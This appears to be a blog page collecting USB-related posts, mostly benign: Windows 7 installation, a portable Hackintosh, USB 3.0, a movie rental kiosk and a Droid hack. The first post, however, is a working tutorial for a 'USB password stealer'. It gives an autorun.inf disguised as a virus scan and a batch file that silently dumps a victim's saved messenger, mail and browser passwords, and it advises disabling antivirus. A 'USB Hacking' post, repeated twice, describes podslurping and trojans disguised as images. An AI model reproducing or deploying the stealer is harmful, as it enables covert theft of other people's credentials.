Backup\Steal Passwords Using a USB

This post is of-course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.

 

Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

• MSN Messenger
• Windows Messenger (In Windows XP)
• Windows Live Messenger (In Windows XP/Vista/7)
• Yahoo Messenger (Versions 5.x and 6.x)
• Google Talk
• ICQ Lite 4.x/5.x/2003
• AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
• Trillian
• Trillian Astra
• Miranda
• GAIM/Pidgin
• MySpace IM
• PaltalkScene
• Digsby

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

• Outlook Express
• Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
• Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
• Windows Mail
• Windows Live Mail
• IncrediMail
• Eudora
• Netscape 6.x/7.x (If the password is not encrypted with master password)
• Mozilla Thunderbird (If the password is not encrypted with master password)
• Group Mail Free
• Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
• Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
• Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview - IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB

 

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly

51.526392 -0.091389

How To Install Windows 7 From A USB Stick, The Easy Way

Window 7 is the one of the best OS system which is used by the people all over the world and with greater popularity of this OS system every one want to install window 7 in their PC normally everyone know that how to install window 7 using DvD but one of the hottest question which i saw in many forums is “How to Install Windows 7 from a USB Drive” .i will give you the step to step tutorial to install Windows 7 from a USB Drive.

By using this method you can save lots of your valuable time as to Installs from a flash drive tend to take about 75% of the time it takes with a DVD.It will took 20 minutes instead of 30 minute which is took by DVD .

Here we start a process to install Windows 7 from a USB Drive just follow simple steps show below:

1. First of all you have USB Drive,which must be at least 4 GB.

2.Plug the drive into your PC.

3.After that open a command prompt as administrator. (Right click, Open as Admin, or Ctrl+Shift+Click)

4.Get the drive number by typing:

Diskpart => List disk => In my PC USB disk was number 1.

5.After doing just Format the drive by typing:

Select disk 1 => clean => Create partition primary => Select partition 1 => Active => Format fs NTFS => assign => Exit

6.After that mount the Windows 7 beta iso or insert the disk.

7.Then you can copy everything from the Windows 7 installation DVD/iso onto the USB key (a simple drag and drop will do).

8.Now you can insert the thumb drive into the system you want to install Windows 7 onto and boot the system. The installation will now proceed as usual—but faster.

Now wasn’t that easy.

51.526392 -0.091389

How to Create a Portable Hackintosh on a USB Thumb Drive

There are tons of awesome live, bootable Linux systems, but what if you need to run OS X? Reader Will shows us how to put a portable version of OS X on a thumb drive and boot it on (most) Intel computers.

People put linux on their flash drives all the time. They also get hackintosh on their hard drives quite often. However, it’d be nice to be able to get the same live experience we get with Linux using OS X. With a distribution of OS X 10.6.2 called iPortable Snow, we can.

You’ll need an actual Mac to create the thumb drive (some Hackintoshes may work; mine didn’t). Search your favorite torrent site for iPortable Snow and download it. While it’s downloading, format your external hard drive or thumb drive (You’ll need at least an 8 GB thumb drive for this). Open up Disk Utility and select the drive you want to put OS X on. Go to the Partition tab and create one partition, formatted as Mac OS Extended (Journaled). Hit Options and make sure you’re using the Master Boot Record option. Then hit Apply to format the drive.

To read more about this fascinating subject have a look at Lifthacker.com

51.526392 -0.091389

US Blockbuster Create Flix on Stix

Blockbuster might want to put some extra polish on that new advertising campaign. There’s apparently a new service around the corner called “Flix On Stix” that uses a kiosk model similar to Redbox, only instead of getting a DVD, you simply plug in a USB thumb drive and download the movie rental in seconds. Maybe Redbox should start planning a new advertising campaign too? Or is this new technology destined to go obsolete almost as soon as it begins? Let’s weigh the pros and cons.

 

Pros
·Selection – A kiosk should have room for enough hard drives to store thousands of movies, so hopefully you won’t be limited to new releases of the last few months. If anything can give these kiosks an edge, it will be finding user-friendly ways to exploit this advantage.

·No DVD Rental Headaches – Since the movie deletes itself after the rental period, you don’t have to rush back to return anything. No late fees either. Also, since we’re dealing with data, you won’t end up with a scratched disk and nothing will be checked out. Take that Redbox!

Cons
·Actually Watching What You Rent – According to my research on different online electronics sites, most new Blu-ray players have USB inputs. A little more than half of televisions do, and it’s still a rarity with DVD players. Most likely, these numbers will increase rapidly. Cool! But, what if you didn’t buy a new TV or Blu-ray player in the last few years? Unless you have a cord or some wireless way to beam your computer’s desktop to your television, you’re stuck watching movies on your computer. Fine for some, but not ideal for watching movies with others. Or you can buy a Flix On Stix box, the price of which has not yet been announced.

·The Internet – And here’s the killer. Redbox still makes sense for people who don’t want to mess with newfangled equipment like Rokus and Apple TV and the like. But are those same technology-phobic people going to want to deal with USB drives? Also, not only are most Blu Ray players equipped with USB imports, but almost all models are Wifi ready. That means people can access online streaming and downloading with their home theater, which seems even easier than going to a kiosk.

The Verdict:
It’s a good idea, but if technology keeps developing at it’s current pace, the entire target market for this type of rental will have their internet connected to their home theater soon. With so many streaming, downloading and on-demand options available this way, it seems like Flix On Sticks may be obsolete within a year or so under its current model. Come to think of it, Redbox might want to watch their back too.

But let’s hear your thoughts. Are USB rentals a Godsend or a gimmick that will fade fast?

51.526392 -0.091389

Turn Your Flash Drive into a Portable Privacy Toolkit

Whether you’re trying to increase your security at an internet café, tunnel your way to your home computer from your cubicle, or leave no trace on your friend’s borrowed computer, a flash drive turned portable privacy toolkit is invaluable.

Flash drives are enormously handy for carting around files, taking portable applications with you, and serving as a mobile computing base when you’re away from home. They’re also excellent tools for increasing your privacy when you’re away from your home computer. Below I’ll point you toward methods of setting up secure connections with SSH and round up a few of your best options for SSH-friendly applications; then we’ll look into encrypting data, permanently erasing data, and otherwise covering your tracks on any machine you’re using.

Before we begin, a big fat disclaimer is in order. Working from a flash drive privacy toolkit, in most situations, is rife with compromises. There is no way to, for example, set up a totally bulletproof system for browsing privately and anonymously from work. You can dodge IT, you can encrypt and tunnel, you can worm your way around security measures, and you might even be able to do it without getting caught. Doing so is grounds for termination at many company, however, and the IT admins frown heavily on users who punch holes in the firewall. If you absolutely must alleviate the boredom of your workday by streaming music from your home PC or browsing “off record” from your office, your best bet is to bring a netbook and tether it to your cellphone so all your activity occurs completely off the company networks and remains undetectable by your corporate overlords.

All of that said, the following tricks and applications push the limits of what the humble flash drive and non-administrative rights can do. We know you’ll find more than a few tricks that will make life from your flash drive toolkit more secure and your computer activities more private.

Read More

51.526392 -0.091389

USB Hacking

Originally posted on www.watchyourend.com

“Hey can I charge my iPod on your laptop for a few minutes? Hey thanks man, have a free USB stick, a friend gave it to me and I already have a ton of these things, oh check out the photo he put on there it’s hillarious!”

iPod Sneakiness

Bruce Schneier discusses an article recently published in the Spring issue of 2600 titled “iPod Sneakiness” where the author mixes a combination of social engineering with an iPod running a *podslurping application. Imagine if you (or your employees) were at a Starbuck’s with your laptop and someone came up to you and innocently asked if they could plug their iPod into your computer to power it up. If that iPod has a podslurping application installed on that iPod they would be sucking more than power from your laptop, they would also be sucking down files and passwords from your system.

I used to work for a large public technology company that actually has a Starbucks on campus. Since the Starbucks is not company owned, anyone can sit in the coffee shop without security badges. The amount of potential information that could be compromised from an attack such as this is beyond comprehension, as engineers, IT staff and top level executives all visit this “hub” with their laptops.

Making a Trojan Clickalicious

In an further discussion of the Dark Reading article discussing a recent penetration test on a credit union, using USB sticks and a Trojan; it appears that Autorun was not used to run the application. Instead the application was masked as a JPEG image using Windows ability to mask extensions, and embed an icon into the executable, so the credit union employees thought they were opening an image, not executing an application.

*Podslurping is a term to describe where a portable storage device such as an iPod is used to illicitly download large quantities of data by directly plugging it in to a computer, where the data is held, or which is on the inside of a firewall where the data is held. As these storage devices get smaller and their storage capacity gets larger it is becoming an increasing security risk to companies and government agencies. Access is gained while the computer is unattended.

For more cool articles try www.watchyourend.com

51.526392 -0.091389

USB 3.0: Everything You Need To Know

Within the past 14 years, the Universal Serial Bus (USB) has become the standard interface to connect devices to a computer. Whether it’s an external hard drive, a camera, the mouse, a printer, or a scanner, the physical connection to transfer data between devices generally is a USB cable. The interface is indeed universal.

USB technology has been under development since 1993. The first official definition, USB 1.0, was introduced in 1996. It provides a Low-Speed transfer rate of 1.5 Mbits/s for sub-channel keyboards and mice, and a Full-Speed channel at 12 Mbits/s. USB 2.0, which came in 2001, made a leap to Hi-Speed transfer rates of up to 480 Mbits/s. In 2010, USB 3.0 has finally hit the market.

So what can you expect from USB 3.0 and how will it affect you?

USB 3.0 Specifications

A number of changes have been implemented in USB 3.0 to satisfy the increased demands of external devices. Here is a quick USB technology overview:

• Transfer Rate
  This new SuperSpeed interface provides realistic transfer rates of around 3,200 Mbits/s or 3.2 Gbits/s. The theoretical top signaling rate is at 4.8 Gbits/s.
• Data Transfer
  USB 3.0 introduces full duplex data transfer. Two of five lanes are reserved for transmitting data, while another pair is dedicated to receiving data, meaning that USB 3.0 can read and write data simultaneously at full speed. Previous USB specifications did not support bi-directional data transfer.
• Power
  The unit load has been increased to 150 mA and a configured device can draw up to six unit loads, which adds up to 900 mA. This exceeds USB 2.0 by 80% and leads to faster recharging or powering of more than four devices from a single hub. In addition, the minimum device operating voltage was dropped from 4.4 V to 4 V, which saves energy.
• Power Management
  USB 3.0 suspends device polling, which is replaced by interrupt-driven protocol. As a result, idle devices won’t experience a power drain since a signal from the device is required to initiate data transfer. With USB 2.0 the host controller used to look for active transfers, slowly draining power. Briefly, USB 3.0 supports idle, sleep, and suspend states, as well as link-, device-, and function-level power management (Wikipedia).
• Physical Appearance
  The above described specifications are also represented in the physical appearance of USB 3.0. While the cable was previously described to be thicker because it contains four more wires than USB 2.0, this appears not to be the case now. The plug, however, is a dead giveaway for USB 3.0. It contains an additional set of connectors, as illustrated in the image below.

The Good News

New technology is very exciting. But what does it mean? Will you still be able to use your old USB hardware? How will the new USB technology affect your everyday life? What are the benefits?

• Compatibility
  USB 3.0 is backwards compatible with USB 2.0. So whether you get a new USB 3.0 device or a new computer that supports USB 3.0, your old device will be able to communicate with the new interface. Naturally, it will do so at the old USB 2.0 speed. However, you won’t be able to use a USB 3.0 cable to connect a USB 2.0 device.
• Transfer Rate
  Now I bet all this Megabit and Gigabit per second numbers sound impressive, but what does it actually translate to? Well, let me give you an example. With USB 3.0 you could transfer a 10 GB file from your computer to an external drive in approximately 25 seconds. With USB 2.0 this would take more than five minutes.
• Benefits
  The devices that will benefit most from USB 3.0 are those that already outspeed USB 2.0, including HD webcams, Blu-Ray drives, or some external hard drives.
• Support by Operating Systems
  Windows Vista, Windows 7, and Linux already support USB 3.0. Mac is expected follow. Given its age, Windows XP will probably not receive an update to support the new interface.

The Bad News

I was tempted to report that there is no bad news, but that’s not true. Let’s say bad news is minimal.

• Cable
  The maximum cable length USB 3.0 supports is reduced to approximately three meters, opposed to five meters with USB 2.0. However, using hubs, the maximum length can be extended to 18 meters.
• Speed Limit
  Naturally, not all devices will be able to make use of the increased speed in USB 3.0. Magnetic hard drives for example, are limited by their RPM and the corresponding read/write speed. Hence, USB 3.0 will not unfold its full beauty until computers are equipped per default with faster hardware, such as solid state drives. But we all know how speedy progress is in the IT world. Give it a year or two and you will be able to fully benefit from USB 3.0.

Feel like you need more information? Computerworld has an excellent USB 3.0 review (USB 3.0: The new speed limit), including tests of currently available USB 3.0 hardware. Are you craving for even more in depth information? Check out this article at Tech Republic: 10 things you should know about USB 2.0 and 3.0. And have a look at Everything USB’s Super Speed USB 3.0 FAQ.

Now aren’t you looking forward to switching to USB 3.0? And if you have already been using a USB 3.0 device, please let the rest of us know how it feels!

51.526392 -0.091389

Universal USB Installer Makes a Persistent Thumb Drive Version of Any Linux OS

Windows: Having a full Linux operating system on a USB thumb drive is pretty neat. Having that OS customized, with your own favorite apps and all your settings intact, is far more helpful. This Windows tool makes that possible.

Universal USB Installer is a stand-alone application that automates the process of downloading, formatting, and installing a Linux OS to a USB drive, as well as implementing a variable amount of “persistence.” “Persistence” means that when you swap out Firefox for Chrome, change keyboard shortcuts, store files in your home directory, or make other changes to your portable Linux, they stick from boot-up to boot-up—which isn’t the case with most portable Linux distributions.

If you’ve already downloaded a Linux installation ISO and run Universal USB Installer from the same directory the ISO is in, the app will find it and use it for the installation, rather than download another copy. Most useful of all, your USB drive can still be read by Windows when you’re done formatting, so creating a “Storage” folder on the drive gives you some room to maneuver whenever a simple storage space is needed.

Universal USB Installer is a free download that runs on Windows systems. If you’ve found another tool for making persistent USB Linux systems, you’d better believe we want to hear about it in the comments.

Universal USB Installer [USB Pen Drive Linux]

51.526392 -0.091389

USB hack connects Droid to printers, video cams, and more

A reverse engineering expert has disclosed a way to make his Motorola Droid host USB-enabled devices, a hack that allows the smartphone for the first time to directly connect to printers, video cameras, TV tuners, and a wide variety of other peripherals.

The modification was devised by Mike Kershaw from Kismet and Mike Baker of OpenWRT and shared with the world by Chris Paget, a new Droid owner and chief hacker for reverse engineering firm H4RDW4RE.

Using a charging cable that plugs into a car’s cigarette lighter, a micro-USB cable, and a USB extender cable, he devised an improvised micro-dongle and connector cable. Getting the Droid to work with a Linux-enabled USB device is as simple as turning the smartphone off, connecting the cable to the host and peripheral and turning the Droid on. As soon as the Motorola logo disappears, you’ll need to unplug the micro-dongle.

Once your Droid is booted – voila -it should now work with the device. You can even pull up a terminal and look at dmesg to see the usual kernel notifications that appear when new USB devices are connected.

To be sure, the Droid isn’t the most robust of USB hosts. To change peripherals, you’ll need to reboot the smartphone. What’s more, leaving the micro-dongle plugged in too long causes the port to get stuck supplying power to devices but not actually recognizing them.

Or as Paget put it in an email: “The capability is now there but it’ll take a while to realise it – I haven’t even managed to mount a USB key yet.”

But the simple mod opens a whole new world to the Droid, since the smartphone will be able to work with hundreds of devices that up to now have been off limits. And besides, the hack is likely to get better over time.

“Hopefully the drivers are sufficiently open-source that these are easy bugs to squash, and that dynamically switching between host mode and peripheral mode won’t be too hard to add either,” Paget writes. Pictures and additional details are here

51.526392 -0.091389

USB Hacking

“Hey can I charge my iPod on your laptop for a few minutes? Hey thanks man, have a free USB stick, a friend gave it to me and I already have a ton of these things, oh check out the photo he put on there it’s hillarious!”

iPod Sneakiness

Bruce Schneier discusses an article recently published in the Spring issue of 2600 titled “iPod Sneakiness” where the author mixes a combination of social engineering with an iPod running a podslurping application (see details below). Imagine if you (or your employees) were at a Starbuck’s with your laptop and someone came up to you and innocently asked if they could plug their iPod into your computer to power it up. If that iPod has a podslurping application installed on that iPod they would be sucking more than power from your laptop, they would also be sucking down files and passwords from your system.

I used to work for a large public technology company that actually has a Starbucks on campus. Since the Starbucks is not company owned, anyone can sit in the coffee shop without security badges. The amount of potential information that could be compromised from an attack such as this is beyond comprehension, as engineers, IT staff and top level executives all visit this “hub” with their laptops.

Making a Trojan Clickalicious

In an further discussion of the Dark Reading article discussing a recent penetration test on a credit union, using USB sticks and a Trojan; it appears that Autorun was not used to run the application. Instead the application was masked as a JPEG image using Windows ability to mask extensions, and embed an icon into the executable, so the credit union employees thought they were opening an image, not executing an application.

Podslurping

Podslurping is a term to describe where a portable storage device such as an iPod is used to illicitly download large quantities of data by directly plugging it in to a computer, where the data is held, or which is on the inside of a firewall where the data is held. As these storage devices get smaller and their storage capacity gets larger it is becoming an increasing security risk to companies and government agencies. Access is gained while the computer is unattended.

USB DRIVES ON AMAZON